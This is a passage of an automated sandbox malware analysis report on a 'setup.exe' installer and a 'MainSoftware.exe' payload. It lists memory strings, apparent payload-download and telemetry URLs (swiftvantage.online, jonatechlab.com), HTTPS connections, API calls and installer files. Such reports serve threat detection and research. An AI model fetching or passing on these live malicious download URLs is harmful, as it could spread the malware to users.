http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
    Source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
    Source: setup.exe, 00000000.00000003.1996568847.000000000C890000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6FE000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C890000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2486648118.0000020F34A73000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/binaryformatter
    Source: MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
    Source: setup.exe, 00000000.00000003.1996568847.000000000C890000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2486648118.0000020F34A73000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
    Source: setup.exe, 00000000.00000003.1996568847.000000000C890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com)
    Source: setup.exe, 00000000.00000003.1996568847.000000000C890000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2486648118.0000020F34A73000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
    Source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34A73000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
    Source: MainSoftware.exe, 00000013.00000002.2488782180.0000020F372E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489694248.0000020F37641000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485552514.000001CE9F8C9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489017313.0000020F373F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489300922.0000020F37515000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2539907807.00000164700D9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575358447.000001A50AD5A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575095760.000001A50ACF1000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/info
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
    Source: MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
    Source: setup.exe, 00000000.00000003.2596043175.0000000008375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datashieldsecure.com/amz/?
    Source: setup.exe, 00000000.00000003.1749852954.00000000083DB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1754878154.0000000005528000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1926971992.0000000005461000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2563773161.00000000054A0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2563971946.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datashieldsecure.com/amz/?source_id=1
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6C1000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2485250859.000001CE9F760000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485737833.000001CE9F921000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487246699.0000020F35279000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/FantasticFiasco/serilog-sinks-http.git
    Source: setup.exe, 00000000.00000003.1996568847.000000000C80C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dot
    Source: setup.exe, 00000000.00000003.1996568847.000000000C727000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000CB33000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C6EA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C6F8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C83C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C741000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C6F1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C73C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C74D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C870000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C7F6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000CAE9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C772000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C821000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C549000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000CB85000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000CB1B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C6D0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000CAFE000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C6FE000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000C763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
    Source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
    Source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
    Source: MainSoftware.exe, 00000013.00000002.2488855338.0000020F373A7000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeE
    Source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37755000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DF5000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeGk
    Source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37759000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimet
    Source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
    Source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6AB000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2485427774.000001CE9F7A0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487213233.0000020F35241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487133129.0000020F3520D000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6BC000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2485427774.000001CE9F7A8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485674994.000001CE9F911000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-formatting-compact
    Source: MainSoftware.exe, 00000013.00000002.2487246699.0000020F35270000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-sinks-file
    Source: MainSoftware.exe, 00000013.00000002.2487246699.0000020F35270000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-sinks-fileC
    Source: MainSoftware.exe, 00000013.00000002.2485317241.000001CE9F771000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485250859.000001CE9F767000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com%/install/getfiles/
    Source: MainSoftware.exe, 00000013.00000002.2486990654.0000020F34DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000013.00000002.2485317241.000001CE9F771000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485250859.000001CE9F767000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com/install/whattoinstall/Ghttps://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000013.00000002.2486990654.0000020F34DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jonatechlab.com/logs/telemetry
    Source: MainSoftware.exe, 00000013.00000002.2485317241.000001CE9F771000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485250859.000001CE9F767000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com/logs/telemetry-MyPersistentApp_Hourly
    Source: MainSoftware.exe, 00000013.00000002.2485317241.000001CE9F771000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485250859.000001CE9F767000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.comH123e4567-e89b-12d3-a456-426614174000
    Source: setup.exe, 00000000.00000003.1749852954.00000000083DB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2603804629.0000000008340000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1926971992.0000000005461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe
    Source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe1Surfclu
    Source: setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exeq
    Source: setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg4
    Source: setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605517591.00000000083CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkgxQT
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2608319609.000000000A4C0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2568114439.0000000005481000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2563437302.0000000008D89000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2569973733.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2571370950.0000000008D90000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2565300514.0000000008D8F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564436089.0000000005480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49892 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49902 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49937 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49945 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49962 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49977 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.183.127:443 -> 192.168.2.4:49987 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49999 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:50008 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004515F0 SendMessageW,GetParent,GetWindowRect,GetParent,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,MapWindowPoints,FillRect,DeleteDC,SendMessageW,SendMessageW,0_2_004515F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004C2A40 NtdllDefWindowProc_W,0_2_004C2A40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00328020 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_00328020
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003A4640 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_003A4640
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003287F0 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,0_2_003287F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00328EA0 NtdllDefWindowProc_W,GetSysColor,0_2_00328EA0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00332FC0 NtdllDefWindowProc_W,0_2_00332FC0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00341040 NtdllDefWindowProc_W,0_2_00341040
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0032B0A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,0_2_0032B0A0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00333130 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00333130
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0034F3F0 NtdllDefWindowProc_W,0_2_0034F3F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040F470 NtdllDefWindowProc_W,0_2_0040F470
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0033B650 KillTimer,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_0033B650
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0032B890 NtdllDefWindowProc_W,0_2_0032B890
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0032BEF0 NtdllDefWindowProc_W,0_2_0032BEF0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00328020 NtdllDefWindowProc_W,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W,6_2_00328020
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00341040 NtdllDefWindowProc_W,6_2_00341040
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0032B0A0 NtdllDefWindowProc_W,6_2_0032B0A0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00333130 NtdllDefWindowProc_W,6_2_00333130
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0034F3F0 NtdllDefWindowProc_W,6_2_0034F3F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0040F470 NtdllDefWindowProc_W,6_2_0040F470
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0033B650 NtdllDefWindowProc_W,DeleteCriticalSection,6_2_0033B650
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003A4640 NtdllDefWindowProc_W,6_2_003A4640
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0032B890 NtdllDefWindowProc_W,6_2_0032B890
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00328EA0 NtdllDefWindowProc_W,6_2_00328EA0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0032BEF0 NtdllDefWindowProc_W,6_2_0032BEF0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00332FC0 NtdllDefWindowProc_W,6_2_00332FC0
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6e40ab.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4251.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI42FE.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI433D.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI437D.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{67AEF7BA-A109-4700-BE3F-0231069B1923}Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5F91.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5FC1.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6001.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI608E.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6C09.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI4251.tmpJump to behavior
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
